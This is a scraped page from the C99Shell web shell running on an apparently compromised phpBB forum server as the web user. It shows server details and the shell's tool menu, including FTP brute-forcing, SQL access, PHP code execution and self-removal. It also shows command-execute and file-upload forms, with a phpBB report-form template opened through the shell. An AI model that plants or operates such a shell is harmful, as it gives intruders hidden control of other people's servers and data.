!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.23.4. PHP/5.6.40-65+ubuntu20.04.1+deb.sury.org+1 

uname -a: Linux foro-restaurado-2 5.15.0-1040-oracle #46-Ubuntu SMP Fri Jul 14 21:47:21 UTC 2023
aarch64
 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/usr/share/nginx/html/phpbb3/cache2/   drwxrwxr-x
Free 83.38 GB of 96.73 GB (86.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     tpl_prosilver_report_body.html.php (4.76 KB)      -rw-rw-r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php if (!defined('IN_PHPBB')) exit; $this->_tpl_include('overall_header.html'); ?>

<h2 class="titlespace"><?php if ($this->_rootref['S_REPORT_POST']) {  echo ((isset($this->_rootref['L_REPORT_POST'])) ? $this->_rootref['L_REPORT_POST'] : ((isset($user->lang['REPORT_POST'])) ? $user->lang['REPORT_POST'] : '{ REPORT_POST }')); } else { echo ((isset($this->_rootref['L_REPORT_MESSAGE'])) ? $this->_rootref['L_REPORT_MESSAGE'] : ((isset($user->lang['REPORT_MESSAGE'])) ? $user->lang['REPORT_MESSAGE'] : '{ REPORT_MESSAGE }')); } ?></h2>

<form method="post" action="<?php echo (isset($this->_rootref['S_REPORT_ACTION'])) ? $this->_rootref['S_REPORT_ACTION'] : ''?>" id="report">
<div class="panel">
    <div class="inner"><span class="corners-top"><span></span></span>

    <div class="content">
        <p><?php if ($this->_rootref['S_REPORT_POST']) {  echo ((isset($this->_rootref['L_REPORT_POST_EXPLAIN'])) ? $this->_rootref['L_REPORT_POST_EXPLAIN'] : ((isset($user->lang['REPORT_POST_EXPLAIN'])) ? $user->lang['REPORT_POST_EXPLAIN'] : '{ REPORT_POST_EXPLAIN }')); } else { echo ((isset($this->_rootref['L_REPORT_MESSAGE_EXPLAIN'])) ? $this->_rootref['L_REPORT_MESSAGE_EXPLAIN'] : ((isset($user->lang['REPORT_MESSAGE_EXPLAIN'])) ? $user->lang['REPORT_MESSAGE_EXPLAIN'] : '{ REPORT_MESSAGE_EXPLAIN }')); } ?></p>
        
        <fieldset>
        <dl class="fields2">
            <dt><label for="reason_id"><?php echo ((isset($this->_rootref['L_REASON'])) ? $this->_rootref['L_REASON'] : ((isset($user->lang['REASON'])) ? $user->lang['REASON'] : '{ REASON }')); ?>:</label></dt>
            <dd><select name="reason_id" id="reason_id" class="full"><?php $_reason_count = (isset($this->_tpldata['reason'])) ? sizeof($this->_tpldata['reason']) : 0;if ($_reason_count) {for ($_reason_i 0$_reason_i $_reason_count; ++$_reason_i){$_reason_val = &$this->_tpldata['reason'][$_reason_i]; ?><option value="<?php echo $_reason_val['ID']; ?>"<?php if ($_reason_val['S_SELECTED']) {  ?> selected="selected"<?php ?>><?php echo $_reason_val['DESCRIPTION']; ?></option><?php }} ?></select></dd>
        </dl>
        <?php if ($this->_rootref['S_CAN_NOTIFY']) {  ?>
            <dl class="fields2">
                <dt><label for="notify1"><?php echo ((isset($this->_rootref['L_REPORT_NOTIFY'])) ? $this->_rootref['L_REPORT_NOTIFY'] : ((isset($user->lang['REPORT_NOTIFY'])) ? $user->lang['REPORT_NOTIFY'] : '{ REPORT_NOTIFY }')); ?>:</label><br /><span><?php echo ((isset($this->_rootref['L_REPORT_NOTIFY_EXPLAIN'])) ? $this->_rootref['L_REPORT_NOTIFY_EXPLAIN'] : ((isset($user->lang['REPORT_NOTIFY_EXPLAIN'])) ? $user->lang['REPORT_NOTIFY_EXPLAIN'] : '{ REPORT_NOTIFY_EXPLAIN }')); ?></span></dt>
                <dd>
                    <label for="notify1"><input type="radio" name="notify" id="notify1" value="1" <?php if (! $this->_rootref['S_NOTIFY']) {  ?>checked="checked"<?php ?> /> <?php echo ((isset($this->_rootref['L_YES'])) ? $this->_rootref['L_YES'] : ((isset($user->lang['YES'])) ? $user->lang['YES'] : '{ YES }')); ?></label> 
                    <label for="notify0"><input type="radio" name="notify" id="notify0" value="0" <?php if ($this->_rootref['S_NOTIFY']) {  ?>checked="checked"<?php ?> /> <?php echo ((isset($this->_rootref['L_NO'])) ? $this->_rootref['L_NO'] : ((isset($user->lang['NO'])) ? $user->lang['NO'] : '{ NO }')); ?></label>
                </dd>
            </dl>
        <?php ?>
        <dl class="fields2">
            <dt><label for="report_text"><?php echo ((isset($this->_rootref['L_MORE_INFO'])) ? $this->_rootref['L_MORE_INFO'] : ((isset($user->lang['MORE_INFO'])) ? $user->lang['MORE_INFO'] : '{ MORE_INFO }')); ?>:</label><br /><span><?php echo ((isset($this->_rootref['L_CAN_LEAVE_BLANK'])) ? $this->_rootref['L_CAN_LEAVE_BLANK'] : ((isset($user->lang['CAN_LEAVE_BLANK'])) ? $user->lang['CAN_LEAVE_BLANK'] : '{ CAN_LEAVE_BLANK }')); ?></span></dt>
            <dd><textarea name="report_text" id="report_text" rows="10" cols="76" class="inputbox"><?php echo (isset($this->_rootref['REPORT_TEXT'])) ? $this->_rootref['REPORT_TEXT'] : ''?></textarea></dd>
        </dl>
        </fieldset>
    </div>

    <span class="corners-bottom"><span></span></span></div>
</div>

<div class="panel">
    <div class="inner"><span class="corners-top"><span></span></span>

    <div class="content">
        <fieldset class="submit-buttons">
            <input type="submit" name="submit" class="button1" value="<?php echo ((isset($this->_rootref['L_SUBMIT'])) ? $this->_rootref['L_SUBMIT'] : ((isset($user->lang['SUBMIT'])) ? $user->lang['SUBMIT'] : '{ SUBMIT }')); ?>" />&nbsp;
            <input type="submit" name="cancel" class="button2" value="<?php echo ((isset($this->_rootref['L_CANCEL'])) ? $this->_rootref['L_CANCEL'] : ((isset($user->lang['CANCEL'])) ? $user->lang['CANCEL'] : '{ CANCEL }')); ?>" />
            <?php echo (isset($this->_rootref['S_FORM_TOKEN'])) ? $this->_rootref['S_FORM_TOKEN'] : ''?>
        </fieldset>
    </div>

    <span class="corners-bottom"><span></span></span></div>
</div>
</form>

<?php $this->_tpl_include('overall_footer.html'); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by HackingTool | HackingTool | Generation time: 0.0036 ]--